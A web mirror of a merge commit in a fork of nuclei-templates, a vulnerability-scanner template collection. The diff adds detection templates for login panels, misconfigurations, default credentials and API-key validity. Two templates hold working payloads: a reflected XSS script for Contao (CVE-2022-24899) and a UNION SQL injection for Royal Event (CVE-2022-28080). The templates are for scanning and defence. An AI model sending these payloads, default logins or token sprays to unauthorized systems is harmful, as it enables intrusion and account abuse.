daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:master' into dashboard

patch-1
MostInterestingBotInTheWorld 2022-06-23 13:30:49 -04:00 committed by GitHub
parent 64a9291239 89ca1b1036
commit b7048a0fd1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
78 changed files with 3014 additions and 1651 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
.new-additions
View File

@ -1,23 +1,12 @@
cves/2018/CVE-2018-14918.yaml
cves/2019/CVE-2019-18665.yaml
cves/2019/CVE-2019-20210.yaml
cves/2021/CVE-2021-25085.yaml
cves/2021/CVE-2021-27309.yaml
cves/2022/CVE-2022-29299.yaml
cves/2022/CVE-2022-29301.yaml
exposed-panels/fuji-xerox-printer-detect.yaml
exposed-panels/geoserver-login-panel.yaml
exposed-panels/ibm/ibm-maximo-login.yaml
exposed-panels/ibm/ibm-websphere-admin-panel.yaml
exposed-panels/ictprotege-login-panel.yaml
exposed-panels/magento-downloader-panel.yaml
exposed-panels/officekeeper-admin-login.yaml
exposed-panels/qnap/qnap-photostation-panel.yaml
exposed-panels/qnap/qnap-qts-panel.yaml
exposed-panels/synopsys-coverity-panel.yaml
exposures/configs/editor-exposure.yaml
exposures/files/vagrantfile-exposure.yaml
technologies/hashicorp-boundary-detect.yaml
token-spray/api-1forge.yaml
token-spray/api-amdoren.yaml
vulnerabilities/other/finecms-sqli.yaml
cves/2022/CVE-2022-24899.yaml
cves/2022/CVE-2022-28080.yaml
default-logins/wildfly/wildfly-default-login.yaml
exposed-panels/aqua-enterprise-panel.yaml
exposed-panels/contao-login-panel.yaml
exposed-panels/royalevent-management-panel.yaml
exposed-panels/teamcity-login-panel.yaml
misconfiguration/teamcity/teamcity-guest-login-enabled.yaml
misconfiguration/teamcity/teamcity-registration-enabled.yaml
misconfiguration/wp-registration-enabled.yaml
token-spray/api-digitalocean.yaml
token-spray/api-segment.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1212 | daffainfo | 565 | cves | 1217 | info | 1238 | http | 3306 |
| panel | 528 | dhiyaneshdk | 439 | exposed-panels | 538 | high | 908 | file | 76 |
| lfi | 469 | pikpikcu | 316 | vulnerabilities | 459 | medium | 698 | network | 50 |
| xss | 386 | pdteam | 268 | technologies | 258 | critical | 420 | dns | 17 |
| wordpress | 378 | geeknik | 185 | exposures | 220 | low | 190 | | |
| exposure | 316 | dwisiswant0 | 168 | misconfiguration | 201 | unknown | 6 | | |
| rce | 304 | 0x_akoko | 143 | workflows | 187 | | | | |
| cve2021 | 300 | princechaddha | 143 | token-spray | 169 | | | | |
| wp-plugin | 276 | pussycat0x | 124 | default-logins | 96 | | | | |
| tech | 274 | gy741 | 121 | file | 76 | | | | |
| cve | 1219 | daffainfo | 601 | cves | 1224 | info | 1284 | http | 3361 |
| panel | 537 | dhiyaneshdk | 441 | exposed-panels | 548 | high | 909 | file | 76 |
| lfi | 471 | pikpikcu | 316 | vulnerabilities | 460 | medium | 704 | network | 50 |
| xss | 391 | pdteam | 268 | technologies | 258 | critical | 420 | dns | 17 |
| wordpress | 380 | geeknik | 185 | exposures | 222 | low | 193 | | |
| exposure | 320 | dwisiswant0 | 168 | token-spray | 204 | unknown | 6 | | |
| rce | 304 | 0x_akoko | 145 | misconfiguration | 201 | | | | |
| cve2021 | 302 | princechaddha | 143 | workflows | 187 | | | | |
| wp-plugin | 277 | gy741 | 124 | default-logins | 96 | | | | |
| tech | 275 | pussycat0x | 124 | file | 76 | | | | |
**272 directories, 3673 files**.
**273 directories, 3729 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

3233
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1212 | daffainfo | 565 | cves | 1217 | info | 1238 | http | 3306 |
| panel | 528 | dhiyaneshdk | 439 | exposed-panels | 538 | high | 908 | file | 76 |
| lfi | 469 | pikpikcu | 316 | vulnerabilities | 459 | medium | 698 | network | 50 |
| xss | 386 | pdteam | 268 | technologies | 258 | critical | 420 | dns | 17 |
| wordpress | 378 | geeknik | 185 | exposures | 220 | low | 190 | | |
| exposure | 316 | dwisiswant0 | 168 | misconfiguration | 201 | unknown | 6 | | |
| rce | 304 | 0x_akoko | 143 | workflows | 187 | | | | |
| cve2021 | 300 | princechaddha | 143 | token-spray | 169 | | | | |
| wp-plugin | 276 | pussycat0x | 124 | default-logins | 96 | | | | |
| tech | 274 | gy741 | 121 | file | 76 | | | | |
| cve | 1219 | daffainfo | 601 | cves | 1224 | info | 1284 | http | 3361 |
| panel | 537 | dhiyaneshdk | 441 | exposed-panels | 548 | high | 909 | file | 76 |
| lfi | 471 | pikpikcu | 316 | vulnerabilities | 460 | medium | 704 | network | 50 |
| xss | 391 | pdteam | 268 | technologies | 258 | critical | 420 | dns | 17 |
| wordpress | 380 | geeknik | 185 | exposures | 222 | low | 193 | | |
| exposure | 320 | dwisiswant0 | 168 | token-spray | 204 | unknown | 6 | | |
| rce | 304 | 0x_akoko | 145 | misconfiguration | 201 | | | | |
| cve2021 | 302 | princechaddha | 143 | workflows | 187 | | | | |
| wp-plugin | 277 | gy741 | 124 | default-logins | 96 | | | | |
| tech | 275 | pussycat0x | 124 | file | 76 | | | | |

1
cves/2010/CVE-2010-0972.yaml
View File

@ -9,6 +9,7 @@ info:
- https://www.exploit-db.com/exploits/11738
- https://www.cvedetails.com/cve/CVE-2010-0972
- http://secunia.com/advisories/38925
- http://www.exploit-db.com/exploits/11738
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0972

1
cves/2010/CVE-2010-1470.yaml
View File

@ -9,6 +9,7 @@ info:
- https://www.exploit-db.com/exploits/12166
- https://www.cvedetails.com/cve/CVE-2010-1470
- http://secunia.com/advisories/39405
- http://www.exploit-db.com/exploits/12166
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1470

1
cves/2010/CVE-2010-1474.yaml
View File

@ -9,6 +9,7 @@ info:
- https://www.exploit-db.com/exploits/12182
- https://www.cvedetails.com/cve/CVE-2010-1474
- http://secunia.com/advisories/39388
- http://www.exploit-db.com/exploits/12182
classification:
cve-id: CVE-2010-1474
tags: cve,cve2010,joomla,lfi

1
cves/2010/CVE-2010-1475.yaml
View File

@ -9,6 +9,7 @@ info:
- https://www.exploit-db.com/exploits/12147
- https://www.cvedetails.com/cve/CVE-2010-1475
- http://secunia.com/advisories/39285
- http://www.exploit-db.com/exploits/12147
classification:
cve-id: CVE-2010-1475
tags: cve,cve2010,joomla,lfi

1
cves/2010/CVE-2010-1533.yaml
View File

@ -9,6 +9,7 @@ info:
- https://www.exploit-db.com/exploits/12142
- https://www.cvedetails.com/cve/CVE-2010-1533
- http://secunia.com/advisories/39258
- http://www.exploit-db.com/exploits/12142
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1533

1
cves/2010/CVE-2010-1535.yaml
View File

@ -9,6 +9,7 @@ info:
- https://www.exploit-db.com/exploits/12151
- https://www.cvedetails.com/cve/CVE-2010-1535
- http://secunia.com/advisories/39254
- http://www.exploit-db.com/exploits/12151
classification:
cve-id: CVE-2010-1535
tags: cve,cve2010,joomla,lfi

1
cves/2010/CVE-2010-1723.yaml
View File

@ -9,6 +9,7 @@ info:
- https://www.exploit-db.com/exploits/12289
- https://www.cvedetails.com/cve/CVE-2010-1723
- http://secunia.com/advisories/39524
- http://www.exploit-db.com/exploits/12289
classification:
cve-id: CVE-2010-1723
tags: cve,cve2010,joomla,lfi

1
cves/2010/CVE-2010-1956.yaml
View File

@ -9,6 +9,7 @@ info:
- https://www.exploit-db.com/exploits/12285
- https://www.cvedetails.com/cve/CVE-2010-1956
- http://secunia.com/advisories/39522
- http://www.exploit-db.com/exploits/12285
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1956

1
cves/2010/CVE-2010-1979.yaml
View File

@ -9,6 +9,7 @@ info:
- https://www.exploit-db.com/exploits/12088
- https://www.cvedetails.com/cve/CVE-2010-1979
- http://secunia.com/advisories/39360
- http://www.exploit-db.com/exploits/12088
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1979

39
cves/2022/CVE-2022-24899.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2022-24899
info:
name: Contao 4.13.2 - Cross-Site Scripting (XSS)
author: ritikchaddha
severity: medium
description: |
Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings.
reference:
- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
- https://nvd.nist.gov/vuln/detail/CVE-2022-24899
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-24899
cwe-id: CWE-79
metadata:
shodan-query: title:"Contao"
tags: cve,cve2022,contao,xss
requests:
- method: GET
path:
- "{{BaseURL}}/contao/%22%3e%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"></script><script>alert(document.domain)</script>'
- '"Not authenticated"'
condition: and
- type: word
part: header
words:
- text/html

70
cves/2022/CVE-2022-28080.yaml Normal file
View File

@ -0,0 +1,70 @@
id: CVE-2022-28080
info:
name: Royal Event - SQL Injection
author: lucasljm2001,ekrause,ritikchaddha
severity: high
description: |
Detects an SQL Injection vulnerability in Royal Event System
reference:
- https://www.exploit-db.com/exploits/50934
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
- https://nvd.nist.gov/vuln/detail/CVE-2022-28080
- https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2022-28080
tags: cve,cve2022,sqli,authenticated,cms,royalevent
requests:
- raw:
- |
POST /royal_event/ HTTP/1.1
Host: {{Hostname}}
Content-Length: 353
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="username"
{{username}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="password"
{{password}}
------WebKitFormBoundaryCSxQll1eihcqgIgD
Content-Disposition: form-data; name="login"
------WebKitFormBoundaryCSxQll1eihcqgIgD--
- |
POST /royal_event/btndates_report.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="todate"
1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- -
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="search"
3
------WebKitFormBoundaryFboH5ITu7DsGIGrD
Content-Disposition: form-data; name="fromdate"
01/01/2011
------WebKitFormBoundaryFboH5ITu7DsGIGrD--
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- '{{md5("{{randstr}}")}}'
- type: status
status:
- 200

2
default-logins/apache/tomcat-default-login.yaml
View File

@ -1,7 +1,7 @@
id: tomcat-default-login
info:
name: ApahceTomcat Manager Default Login
name: Apache Tomcat Manager Default Login
author: pdteam
severity: high
description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.

38
default-logins/wildfly/wildfly-default-login.yaml Executable file
View File

@ -0,0 +1,38 @@
id: wildfly-default-login
info:
name: Wildfly Default Login
author: s0obi
severity: high
description: |
Wildfly default login was discovered
reference:
- https://docs.wildfly.org/26.1/#administrator-guides
tags: wildfly,default-login
requests:
- raw:
- |
GET /management HTTP/1.1
Host: {{Hostname}}
digest-username: admin
digest-password: admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- "management-major-version"
- "product-version"
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

33
exposed-panels/aqua-enterprise-panel.yaml Normal file
View File

@ -0,0 +1,33 @@
id: aqua-enterprise-panel
info:
name: Aqua Enterprise Panel
author: idealphase
severity: info
description: |
Aqua scans container images based on a constantly updated stream of aggregate sources of vulnerability data (CVEs, vendor advisories, and proprietary research)
reference:
- https://www.aquasec.com/
metadata:
verified: true
shodan-query: http.title:"Aqua Enterprise" || http.title:"Aqua Cloud Native Security Platform"
google-query: intitle:"Aqua Cloud Native Security Platform"
tags: panel,aqua,aquasec
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Aqua Enterprise</title>"
- "<title>Aqua Cloud Native Security Platform</title>"
condition: or
- type: status
status:
- 200

29
exposed-panels/contao-login-panel.yaml Normal file
View File

@ -0,0 +1,29 @@
id: contao-login-panel
info:
name: Contao Login Panel
author: princechaddha
severity: info
metadata:
verified: true
shodan-query: http.html:"Contao Open Source CMS"
tags: panel,contao
requests:
- method: GET
path:
- "{{BaseURL}}/contao/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Contao Open Source CMS"
- "<h1>Login</h1>"
condition: and
- type: status
status:
- 200

28
exposed-panels/royalevent-management-panel.yaml Normal file
View File

@ -0,0 +1,28 @@
id: royalevent-management-panel
info:
name: Royal Event Management Admin Panel
author: ritikchaddha
severity: info
metadata:
verified: true
tags: royalevent,panel
requests:
- method: GET
path:
- "{{BaseURL}}/royal_event/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Royal Event Management Software"
- "Welcome Administrator"
condition: and
- type: status
status:
- 200

34
exposed-panels/teamcity-login-panel.yaml Normal file
View File

@ -0,0 +1,34 @@
id: teamcity-login-panel
info:
name: TeamCity Login Panel
author: princechaddha
severity: info
metadata:
verified: true
shodan-query: http.component:"TeamCity"
tags: panel,teamcity,jetbrains
requests:
- method: GET
path:
- "{{BaseURL}}/login.html"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Log in to TeamCity &mdash; TeamCity</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'Version<\/span> ([0-9. (a-z)]+)<\/span>'

29
headless/screenshot.yaml Normal file
View File

@ -0,0 +1,29 @@
id: screenshot
info:
name: Headless Screenshotter
author: V0idC0de,righettod
severity: info
description: Takes a screenshot of the specified URLS.
tags: headless,screenshot
variables:
file: "{{Hostname}}"
headless:
- steps:
- action: setheader
args:
part: request
key: "User-Agent"
value: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0"
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitload
- action: screenshot
args:
fullpage: true
to: "{{file}}"

38
misconfiguration/teamcity/teamcity-guest-login-enabled.yaml Normal file
View File

@ -0,0 +1,38 @@
id: teamcity-guest-login-enabled
info:
name: JetBrains TeamCity - Guest User Access Enabled
author: Ph33r
severity: info
description: |
TeamCity provides the ability to turn on the guest login allowing anonymous access to the TeamCity UI.
reference:
- https://ph33r.medium.com/misconfig-in-teamcity-panel-lead-to-auth-bypass-in-apache-org-exploit-146f6a1a4e2b
- https://www.jetbrains.com/help/teamcity/guest-user.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 7.30
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.component:"TeamCity"
tags: misconfig,teamcity,jetbrains
requests:
- raw:
- |
GET /guestLogin.html?guest=1 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Location: /overview.html'
- 'TCSESSIONID='
condition: and
- type: status
status:
- 302

31
misconfiguration/teamcity/teamcity-registration-enabled.yaml Normal file
View File

@ -0,0 +1,31 @@
id: teamcity-registration-enabled
info:
name: JetBrains TeamCity - Registration Enabled
author: Ph33r
severity: high
description: |
JetBrains - TeamCity - register User Allow
reference:
- https://ph33r.medium.com/misconfig-in-teamcity-panel-lead-to-auth-bypass-in-apache-org-0day-146f6a1a4e2b
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 7.30
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.component:"TeamCity"
tags: misconfig,auth-bypass,teamcity,jetbrains
requests:
- raw:
- |
GET /registerUser.html?init=1 HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 2
matchers:
- type: word
words:
- '<title>Register a New User Account &mdash; TeamCity</title>'

37
misconfiguration/wp-registration-enabled.yaml Normal file
View File

@ -0,0 +1,37 @@
id: wp-registration-enabled
info:
name: WordPress User Registration Enabled
author: tess,DhiyaneshDK
severity: info
description: |
Your WordPress site is currently configured so that anyone can register as a user. If you are not using this functionality, it's recommended to disable user registration as it caused some security issues in the past and is increasing the attack surface.
remediation: |
Disable user registration if not needed. To disable user registration, log in as an administrator and go to Settings -> General and uncheck "Anyone can register".
reference:
- https://www.acunetix.com/vulnerabilities/web/wordpress-user-registration-enabled/
metadata:
verified: true
tags: wordpress,wp,misconfig
requests:
- method: GET
path:
- "{{BaseURL}}/wp-login.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '?action=register"'
- type: word
part: header
words:
- 'text/html'
- type: status
status:
- 200

5
technologies/favicon-detection.yaml
View File

@ -2630,3 +2630,8 @@ requests:
name: "Coverity"
dsl:
- "status_code==200 && (\"-994319624\" == mmh3(base64_py(body)))"
- type: dsl
name: "Aqua Enterprise"
dsl:
- "status_code==200 && (\"-1261322577\" == mmh3(base64_py(body)))"

2
token-spray/api-abuseipdb.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://docs.abuseipdb.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AbuseIPDB.md
tags: token-spray,abuseipdb
self-contained: true

27
token-spray/api-airtable.yaml Normal file
View File

@ -0,0 +1,27 @@
id: api-airtable
info:
name: Airtable API Test
author: daffainfo
severity: info
reference:
- https://airtable.com/api
- https://github.com/daffainfo/all-about-apikey/blob/main/Documents%20%26%20Productivity/Airtable.md
tags: token-spray,airtable
self-contained: true
requests:
- raw:
- |
GET https://api.airtable.com/v0/meta/bases HTTP/1.1
Host: api.airtable.com
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- '"bases"'
- '"id"'
- '"name"'
condition: and

2
token-spray/api-alienvault.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://otx.alienvault.com/api
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AlienVault%20Open%20Threat%20Exchange.md
tags: token-spray,alienvault,exchange
self-contained: true

38
token-spray/api-api2convert.yaml Normal file
View File

@ -0,0 +1,38 @@
id: api-api2convert
info:
name: Api2Convert API Test
author: daffainfo
severity: info
reference:
- https://www.api2convert.com/docs/index.html
- https://github.com/daffainfo/all-about-apikey/blob/main/Documents%20%26%20Productivity/Api2Convert.md
tags: token-spray,api2convert
self-contained: true
requests:
- raw:
- |
POST https://api.api2convert.com/v2/jobs HTTP/1.1
Host: api.api2convert.com
X-Oc-Api-Key: {{token}}
Content-Type: application/json
{
"input": [{
"type": "remote",
"source": "https://example-files.online-convert.com/raster%20image/jpg/example_small.jpg"
}],
"conversion": [{
"target": "png"
}]
}
matchers:
- type: word
part: body
words:
- '"id"'
- '"token"'
- '"type"'
condition: and

22
token-spray/api-apiflash.yaml Normal file
View File

@ -0,0 +1,22 @@
id: api-apiflash
info:
name: ApiFlash API Test
author: daffainfo
severity: info
reference:
- https://apiflash.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/ApiFlash.md
tags: token-spray,apiflash
self-contained: true
requests:
- method: GET
path:
- "https://api.apiflash.com/v1/urltoimage?access_key={{token}}&url=https://selfcontained.test"
matchers:
- type: word
part: body
words:
- 'net::ERR_NAME_NOT_RESOLVED at https://selfcontained.test'

28
token-spray/api-blitapp.yaml Normal file
View File

@ -0,0 +1,28 @@
id: api-blitapp
info:
name: Blitapp API Test
author: daffainfo
severity: info
reference:
- https://blitapp.com/api/
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/Blitapp.md
tags: token-spray,blitapp
self-contained: true
requests:
- raw:
- |
GET https://blitapp.com/api/scheduledcapture HTTP/1.1
Host: blitapp.com
Accept: application/json
Api-key: {{token}}
matchers:
- type: word
part: body
words:
- '"id"'
- '"name"'
- '"apps"'
condition: and

25
token-spray/api-browshot.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-browshot
info:
name: Browshot API Test
author: daffainfo
severity: info
reference:
- https://browshot.com/api/documentation
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/Browshot.md
tags: token-spray,browshot
self-contained: true
requests:
- method: GET
path:
- "https://api.browshot.com/api/v1/simple?url=http://mobilito.net/&instance_id=12&width=640&height=480&key={{token}}"
matchers:
- type: word
part: body
words:
- '"cost"'
- '"priority"'
- '"url"'
condition: and

2
token-spray/api-cooperhewitt.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://collection.cooperhewitt.org/api/methods/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Cooper%20Hewitt.md
tags: token-spray,cooperhewitt
self-contained: true

25
token-spray/api-currencyfreaks.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-currencyfreaks
info:
name: CurrencyFreaks API Test
author: daffainfo
severity: info
reference:
- https://currencyfreaks.com/documentation.html
- https://github.com/daffainfo/all-about-apikey/blob/main/Currency%20Exchange/CurrencyFreaks.md
tags: token-spray,currencyfreaks
self-contained: true
requests:
- method: GET
path:
- "https://api.currencyfreaks.com/latest?apikey={{token}}"
matchers:
- type: word
part: body
words:
- '"date"'
- '"base"'
- '"rates"'
condition: and

25
token-spray/api-currencylayer.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-currencylayer
info:
name: Currencylayer API Test
author: daffainfo
severity: info
reference:
- https://currencylayer.com/documentation
- https://github.com/daffainfo/all-about-apikey/blob/main/Currency%20Exchange/Currencylayer.md
tags: token-spray,currencylayer
self-contained: true
requests:
- method: GET
path:
- "http://api.currencylayer.com/live?access_key={{token}}"
matchers:
- type: word
part: body
words:
- '"terms"'
- '"source"'
- '"quotes"'
condition: and

25
token-spray/api-currencyscoop.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-currencyscoop
info:
name: CurrencyScoop API Test
author: daffainfo
severity: info
reference:
- https://currencyscoop.com/api-documentation
- https://github.com/daffainfo/all-about-apikey/blob/main/Currency%20Exchange/CurrencyScoop.md
tags: token-spray,currencyscoop
self-contained: true
requests:
- method: GET
path:
- "https://api.currencyscoop.com/v1/historical?api_key={{token}}&date=2022-01-01"
matchers:
- type: word
part: body
words:
- '"date"'
- '"base"'
- '"rates"'
condition: and

25
token-spray/api-digitalocean.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-digitalocean
info:
name: DigitalOcean API Test
author: geeknik
severity: info
reference:
- https://docs.digitalocean.com/reference/api/
tags: token-spray,digitalocean
self-contained: true
requests:
- raw:
- |
GET https://api.digitalocean.com/v2/droplets HTTP/1.1
Host: api.digitalocean.com
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- '"droplets":'
- '"meta":'
condition: and

2
token-spray/api-dribbble.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://developer.dribbble.com/v2/
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Dribbble.md
tags: token-spray,dribbble
self-contained: true

2
token-spray/api-europeana.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://pro.europeana.eu/page/search
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Europeana.md
tags: token-spray,europeana
self-contained: true

25
token-spray/api-exchangerateapi.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-exchangerateapi
info:
name: ExchangeRate-API API Test
author: daffainfo
severity: info
reference:
- https://www.exchangerate-api.com/docs/overview
- https://github.com/daffainfo/all-about-apikey/blob/main/Currency%20Exchange/ExchangeRate-API.md
tags: token-spray,exchangerateapi
self-contained: true
requests:
- method: GET
path:
- "https://v6.exchangerate-api.com/v6/{{token}}/latest/USD"
matchers:
- type: word
part: body
words:
- '"time_next_update_utc"'
- '"base_code"'
- '"conversion_rates"'
condition: and

32
token-spray/api-gorest.yaml Normal file
View File

@ -0,0 +1,32 @@
id: api-gorest
info:
name: Gorest API Test
author: daffainfo
severity: info
reference:
- https://gorest.co.in/
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/Gorest.md
tags: token-spray,gorest
self-contained: true
requests:
- raw:
- |
GET https://gorest.co.in/public/v2/users HTTP/1.1
Host: gorest.co.in
Content-Type: application/json
Authorization: Bearer {{token}}
{"name":"Tenali Ramakrishna", "gender":"male", "email":"tenali.rdamakrishna@15ce.com", "status":"active"}
matchers-condition: and
matchers:
- type: status
status:
- 201
- type: word
part: body
words:
- '"name"'

2
token-spray/api-harvardart.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://github.com/harvardartmuseums/api-docs
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Harvard%20Art%20Museums.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Harvard%20Art%20Museums.md
tags: token-spray,harvardart
self-contained: true

25
token-spray/api-host-io.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-host-io
info:
name: host.io API Test
author: daffainfo
severity: info
reference:
- https://host.io/docs
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/host.io.md
tags: token-spray,hostio
self-contained: true
requests:
- method: GET
path:
- "https://host.io/api/full/facebook.com?token=${{token}}"
matchers:
- type: word
part: body
words:
- '"domain"'
- '"rank"'
- '"url"'
condition: and

25
token-spray/api-hunter.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-hunter
info:
name: Hunter API Test
author: daffainfo
severity: info
reference:
- https://hunter.io/api-documentation/v2
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/Hunter.md
tags: token-spray,hunter
self-contained: true
requests:
- method: GET
path:
- "https://api.hunter.io/v2/domain-search?domain=stripe.com&api_key={{token}}"
matchers:
- type: word
part: body
words:
- '"domain"'
- '"disposable"'
- '"webmail"'
condition: and

2
token-spray/api-iconfinder.yaml
View File

@ -6,7 +6,7 @@ info:
severity: info
reference:
- https://developer.iconfinder.com/reference/overview-1
- https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/IconFinder.md
- https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/IconFinder.md
tags: token-spray,iconfinder
self-contained: true

25
token-spray/api-ip2whois.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-ip2whois
info:
name: IP2WHOIS API Test
author: daffainfo
severity: info
reference:
- https://www.ip2whois.com/developers-api
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/IP2WHOIS.md
tags: token-spray,ip2whois
self-contained: true
requests:
- method: GET
path:
- "https://api.ip2whois.com/v2?key={{token}}&domain=daffa.tech&format=json"
matchers:
- type: word
part: body
words:
- '"domain"'
- '"domain_id"'
- '"whois_server"'
condition: and

25
token-spray/api-ipfind.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-ipfind
info:
name: IPFind API Test
author: daffainfo
severity: info
reference:
- https://ipfind.io/documentation
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/IPFind.md
tags: token-spray,ipfind
self-contained: true
requests:
- method: GET
path:
- "https://app.ipfind.io/api/iplocation?apikey={{token}}"
matchers:
- type: word
part: body
words:
- '"continent"'
- '"country"'
- '"zipCode"'
condition: and

27
token-spray/api-jsonbin.yaml Normal file
View File

@ -0,0 +1,27 @@
id: api-jsonbin
info:
name: JSONBin API Test
author: daffainfo
severity: info
reference:
- https://jsonbin.io/api-reference
- https://github.com/daffainfo/all-about-apikey/blob/main/Development/JSONBin.md
tags: token-spray,jsonbin
self-contained: true
requests:
- raw:
- |
GET https://api.jsonbin.io/v3/c HTTP/1.1
Host: api.jsonbin.io
X-Master-key: {{token}}
matchers:
- type: word
part: body
words:
- '"record"'
- '"collectionMeta"'
- '"schemaDocId"'
condition: and

27
token-spray/api-lob.yaml Normal file
View File

@ -0,0 +1,27 @@
id: api-lob
info:
name: Lob API Test
author: daffainfo
severity: info
reference:
- https://docs.lob.com/
- https://github.com/daffainfo/all-about-apikey/blob/main/Data%20Validation/Lob.md
tags: token-spray,lob
self-contained: true
requests:
- raw:
- |
